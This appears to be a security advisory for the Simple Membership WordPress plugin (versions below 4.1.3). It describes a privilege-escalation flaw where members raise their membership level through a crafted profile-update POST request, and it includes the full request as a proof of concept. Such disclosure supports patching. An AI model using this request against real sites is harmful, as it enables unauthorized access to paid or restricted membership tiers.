The plugin does not properly validate the membership_level parameter when editing a profile, allowing members to escalate to a higher membership level by using a crafted POST request. Note: This only affects membership from the plugin, not the WordPress role
To increase the level, the attacker needs to add the membership_level parameter to the POST request sent when updating the profile. POST /membership-login/membership-profile/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: [logged in user with membership level 2] swpm_profile_edit_nonce_val=1c449c7f1a&_wp_http_referer=%2Fmembership-login%2Fmembership-profile%2F&email;=user%40localhost.localhost&password;=&password;_re=&first;_name=user_low&last;_name=user_low☎=&address;_street=123&address;_city=1234&address;_state=123&address;_zipcode=&country;=&company;_name=&swpm;_editprofile_submit=Update&action;=custom_posts&membership;_level=3
CPE | Name | Operator | Version |
---|---|---|---|
simple-membership | lt | 4.1.3 |